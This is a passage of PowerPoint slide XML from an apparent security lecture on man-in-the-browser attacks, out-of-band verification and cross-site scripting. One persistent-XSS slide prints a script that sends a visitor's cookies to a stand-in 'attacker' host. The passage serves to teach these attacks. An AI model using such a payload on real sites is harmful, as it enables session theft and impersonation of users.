            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example 2 (Adding more fields)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" dirty="0"/>
              <a:t>This function allows the attacker to modify what a user sees in the browser. Using this, the malware can change the sites a user browses and make it appear in a certain fashion even presenting information that is not truthful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t>E.g., most bank websites simply require your ID and a PIN (OTP) to log in. Some may use passwords in addition. But if you are under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0" err="1"/>
              <a:t>MitB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" dirty="0"/>
              <a:t> attack, you will see additional fields on the login webpage asking details for like your credit card number, CSV code, card expiry date etc. (things which you need when you actually do a transaction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" dirty="0"/>
              <a:t>The cybercriminal makes the input field look genuine. They look true as the URL is the same even after being compromised. Sometimes, they just say they want to up your security and hence you need to provide them with the required (additional, personal) information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1659327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EDA3-64CD-4CB2-A53A-3DDA8421B798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Man in the Browser Attack Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A46FAE9-622F-49D4-B0F8-224ABA804462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" cap="all" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>OUT-OF-BAND TRANSACTION VERIFICATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto"/>
              </a:rPr>
              <a:t>Out-of-band (OOB) transaction verification is a method of verifying the details of a transaction carried out using first communications channel – e.g. PC communicating with a Web server over the internet – by communicating verification information over a separate communications channel – e.g. sending a verification code using a cellular network to a mobile device associated with the account holder. OOB verification is used to overcome possible compromise of the channel used to originate the transaction, and is considered an effective measure to overcome man-in-the-browser attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1473465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7A00-9CB9-4418-9DD3-CA985E9FFD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16496B93-678D-4BE3-8F8A-0FAAF14BFACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The attacker does not directly target his victim. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>To the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928679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35AD-042C-4A1E-8D18-EC97180BBF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC69BD28-02AC-4581-894D-A84A20D73C71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The only way for the attacker to run his malicious JavaScript in the victim's browser is to inject it into one of the pages that the victim downloads from the website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In the example below, a simple server-side script is used to display the latest comment on a website:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "&lt;html&gt;"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> comment:"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>database.latestComment</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "&lt;/html&gt;"</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3375943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654C-5A94-40FF-96C2-1CFF85C26AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E28F492-70AB-4297-8785-534D0EDF5319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The script assumes that a comment consists only of text. However, since the user input is included directly, an attacker could submit this comment: ”&lt;script&gt;...&lt;/script&gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Any user visiting the page would now receive the following response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                  Latest comment:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>  &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> When the user's browser loads the page, it will execute whatever JavaScript code is contained inside the &lt;script&gt; tags. The attacker has now succeeded with his attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3924141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35611-F894-4C3D-973A-459B1123C5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC389B33-E1E9-49E9-A7EA-D5D1CF540B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>XSS attacks are often divided into two types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, where the malicious string originates from the website's database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, where the malicious string originates from the victim's request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2779038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9404-D273-4737-AFE2-F9E1C4AEEF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5600BD0-6BEE-4227-930A-74962A93A5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175591" y="1825625"/>
            <a:ext cx="4171122" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Let us assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>1) The attacker uses one of the website's forms to insert a malicious string into the website's database.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Diagram of a persistent XSS attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BE9110-ABA6-466A-8787-8DFE504AE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1833563"/>
            <a:ext cx="76581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824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9404-D273-4737-AFE2-F9E1C4AEEF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5600BD0-6BEE-4227-930A-74962A93A5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175591" y="1825625"/>
            <a:ext cx="4171122" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The script </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>   &lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>='http://attacker/?cookie='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, which the attacker can extract from the request when it arrives to his server. Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Diagram of a persistent XSS attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BE9110-ABA6-466A-8787-8DFE504AE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336" y="1825625"/>
            <a:ext cx="7151655" cy="405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441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9404-D273-4737-AFE2-F9E1C4AEEF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5600BD0-6BEE-4227-930A-74962A93A5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175591" y="1825625"/>
            <a:ext cx="4171122" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>2) The victim requests a page from the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>3) The website includes the malicious string from the database in the response and sends it to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>4) The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Diagram of a persistent XSS attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BE9110-ABA6-466A-8787-8DFE504AE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1833563"/>
            <a:ext cx="76581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8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845E-99B0-4693-A6B3-A1D0139E6DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Hijacking types in OSI Level</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148DEBAF-309D-4468-A86E-56AECBDF910A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Network Level Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Application Level Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1888713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09843A-6E94-4CCA-926C-48E215DED782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F85A1D-3ADE-44D3-847C-2BDF370F7C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
